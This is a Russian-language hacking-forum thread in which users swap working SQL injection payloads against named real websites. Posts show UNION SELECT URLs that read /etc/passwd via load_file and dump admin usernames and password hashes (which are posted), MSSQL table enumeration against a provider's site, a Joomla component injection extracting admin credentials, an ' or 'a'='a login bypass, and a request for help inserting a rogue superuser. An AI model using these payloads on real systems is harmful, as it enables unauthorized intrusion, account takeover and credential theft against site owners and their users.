ANTICHAT Forum
HOME FORUMS MEMBERS RECENT POSTS LOG IN  
НОВЫЕ ТОРГОВАЯ НОВОСТИ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 03.07.2009, 16:55
f1re
Новичок
Регистрация: 03.07.2009
Сообщений: 4
С нами: 8872766

Репутация: 0
По умолчанию

Вот так выводит:
http://www.antisocial.be/release.php?id=-999999%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11, 12,13,TABLE_NAME,15,16,17,18,19,20,21,22,23,24,25, 26,27%20FROM%20INFORMATION_SCHEMA.TABLES--

А вот так уже нет:
http://www.antisocial.be/release.php?id=-999999%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11, 12,13,TABLE_NAME,15,16,17,18,19,20,21,22,23,24,25, 26,27%20FROM%20INFORMATION_SCHEMA.TABLES LIM
IT 1,1--

Где грабли?
 
Ответить с цитированием

  #2  
Старый 03.07.2009, 17:18
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

Цитата:
Сообщение от f1re  
Вот так выводит:
http://www.antisocial.be/release.php?id=-999999%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11, 12,13,TABLE_NAME,15,16,17,18,19,20,21,22,23,24,25, 26,27%20FROM%20INFORMATION_SCHEMA.TABLES--

А вот так уже нет:
http://www.antisocial.be/release.php?id=-999999%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11, 12,13,TABLE_NAME,15,16,17,18,19,20,21,22,23,24,25, 26,27%20FROM%20INFORMATION_SCHEMA.TABLES LIM
IT 1,1--

Где грабли?
Код:
http://www.antisocial.be/release.php?id=-999999+UNION+SELECT+1,1,1,1,1,6,7,8,9,1,1,1,1,group_concat(TABLE_NAME),1,1,1,1,1,2,2,2,2,2,2,2,2+FROM+INFORMATION_SCHEMA.TABLES--
CTRL+A

а вообще сдался тебе этот лимит:

Код:
http://www.antisocial.be/release.php?id=-999999+UNION+SELECT+1,1,1,1,1,6,7,8,9,1,1,1,1,load_file('/etc/passwd'),1,1,1,1,1,2,2,2,2,2,2,2,2--
или так:
Код:
http://www.antisocial.be/dotclear/admin/auth.php

http://www.antisocial.be/release.php?id=-999999+UNION+SELECT+1,1,1,1,1,6,7,8,9,1,1,1,1,group_concat(user_name,user_status,user_pwd),1,1,1,1,1,2,2,2,2,2,2,2,2+from+antisocialbe.dc_user--

Последний раз редактировалось Pashkela; 03.07.2009 в 17:53..
 
Ответить с цитированием

  #3  
Старый 03.07.2009, 18:26
f1re
Новичок
Регистрация: 03.07.2009
Сообщений: 4
С нами: 8872766

Репутация: 0
По умолчанию

Цитата:
Сообщение от Pashkela  
или так:
Код:
http://www.antisocial.be/dotclear/admin/auth.php

http://www.antisocial.be/release.php?id=-999999+UNION+SELECT+1,1,1,1,1,6,7,8,9,1,1,1,1,group_concat(user_name,user_status,user_pwd),1,1,1,1,1,2,2,2,2,2,2,2,2+from+antisocialbe.dc_user--
Пардон, а вот можно с этого момента поподробнее?
Как ты вышел на user_name,user_status,user_pwd и antisocialbe.dc_user?
И, до кучи... Запрос выводит
Код:
12ab240ccb8c845c24b708afc7fc050a83629fb9a,1d1c35cc656c12e10f083e7edec3364861fe88cb4
Я так понимаю, это закриптованные логин и пасс?
 
Ответить с цитированием

  #4  
Старый 03.07.2009, 18:56
RedX
Познающий
Регистрация: 12.06.2008
Сообщений: 32
С нами: 9427499

Репутация: 22
По умолчанию

Цитата:
Сообщение от f1re  
Пардон, а вот можно с этого момента поподробнее?
Как ты вышел на user_name,user_status,user_pwd и antisocialbe.dc_user?
И, до кучи... Запрос выводит
Код:
12ab240ccb8c845c24b708afc7fc050a83629fb9a,1d1c35cc656c12e10f083e7edec3364861fe88cb4
Я так понимаю, это закриптованные логин и пасс?
Сипт может спокойно выводить структуру базы и данные из неё.

Fields user_id:user_pwd

[0]:admin:2ab240ccb8c845c24b708afc7fc050a83629fb9a
[1]:antisocial:d1c35cc656c12e10f083e7edec3364861fe88c b4

Вот что выводит.
 
Ответить с цитированием

  #5  
Старый 21.08.2007, 13:32
Red_Red1
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
С нами: 10172486

Репутация: 874
По умолчанию

Почитай статью КЕША.
http://forum.antichat.ru/showthread.php?t=30501
Там без юнион. Мне очень помогла статья, многие скули удалось провести.
 
Ответить с цитированием

  #6  
Старый 21.08.2007, 13:40
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
С нами: 10892546

Репутация: 2274


По умолчанию

Red_Red1, ЧУВАК! Огромное тебе спасибо и низкий поклон!
Извените за оффтоп, но не удержался!
 
Ответить с цитированием

  #7  
Старый 23.08.2007, 13:02
x.Elf
Познающий
Регистрация: 24.05.2007
Сообщений: 38
С нами: 9982591

Репутация: 29
По умолчанию

Короче есть такой сайтец : uralsmart.ru(провайдр кокойто)
на нем есть mssql injection:
http://uralsmart.ru/pages/?id=(SELECT+TOP+1+table_name+FROM+INFORMATION_SCHE MA.tables)--
провожу я - узнал все таблы:

'aSellers','aResponsiblePersons',
'eAuth_Groups',%20'eAuth_Groups_Members',
%20'eNotify_Log','ePage_Trans','eRoles',%20
'eRoles_Functions','syssegments','eRoles_Objects
','sysconstraints','aBlanks','aTariffs_Ethernet','
aTariffs_ADSL','aVacancy',%20'aTariffs_IPtel_Trunk ',
%20'aSharpdesignPortfolio','aTariffs_IPtel_World',
'xSearch_Pages','xSearch_Triads','xSearch_Words',
%20'eAuth','ePage','aTariffs_Dialup','vmNews','
dtproperties',%20'aHotLinks','zForms_Fields','
aSellers_Groups',%20'zForms_Forms','MainMenu','
votes','votes_answers','aHotImgs','mNews',%20
'Results','vAuth','vAuth_Active_NT','
vAuth_Active_Post','mWishBook_Groups',
'vAuth_Active_Cookies'%20,%20'mWishBook_Messages',
'aConnectZones','aSellers_Districts','mNews_Mailli st'

то что я нашел...(колумны я не стал писать) - но вот есть трабл:
Вот к примеру таблица eAuth в ней есть несколько колумнов : Name,Login,Pwd...
Вот проблема: колумн name я вывожу - се окей а вот
дело доходит до колумна pwd - пытаюсь вывести а меня mssql либо лесом посылает - ругается ... либо кидает на идекс сайта.........Как вывести Pwd?
Там еще много таблиц с колумноми pwd и все они выбрасыват....Help

Последний раз редактировалось x.Elf; 23.08.2007 в 13:05..
 
Ответить с цитированием

  #8  
Старый 23.08.2007, 21:45
cheb
Познающий
Регистрация: 31.07.2006
Сообщений: 46
С нами: 10409701

Репутация: 18
По умолчанию

есть уязвимость в поле ПАРОЛЬ,типa ' or 'a'='a, тоесть теоретически получается что можно залогинится под любым существующим логином, но, какой бы существующий логин я не писал, всеравно захожу от одного и того же юзера. как можно поиметь учетку админа?
 
Ответить с цитированием

  #9  
Старый 24.08.2007, 20:54
Dr.Z3r0
Leaders of The World
Регистрация: 06.07.2007
Сообщений: 246
С нами: 9920546

Репутация: 1796
По умолчанию

Цитата:
Сообщение от cheb  
есть уязвимость в поле ПАРОЛЬ,типa ' or 'a'='a, тоесть теоретически получается что можно залогинится под любым существующим логином, но, какой бы существующий логин я не писал, всеравно захожу от одного и того же юзера. как можно поиметь учетку админа?
Хех... попробуй
Код:
' or 'a'='a' LIMIT 0,1 /*
затем
Код:
' or 'a'='a' LIMIT 1,1 /*
пока не найдещь того юзера который тебе нужен...
__________________
Кто я?..
 
Ответить с цитированием

  #10  
Старый 24.08.2007, 19:22
Kaimi
Познавший АНТИЧАТ
Регистрация: 23.08.2007
Сообщений: 1,237
С нами: 9851426

Репутация: 1676


По умолчанию

На сайте под управлением joomla есть уязвимость
http://site.com/index.php?option=com_rwcards&task=listCards&catego ry_id=-1'union%20select%201,2,03,4,concat(char(117,115,10 1,114,110,97,109,101,58),username,char(112,97,115, 115,119,111,114,100,58),password),50,044,076,0678, 07%20from%20jos_users/*

Хэш пароля админа ломаться не хочет, как бы мне проапдейтить хэш админа или добавить своего суперюзера?

Пробовал INSERT INTO и UPDATE, но "то ли лыжи не едут, то ли я е%$#*тый"
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.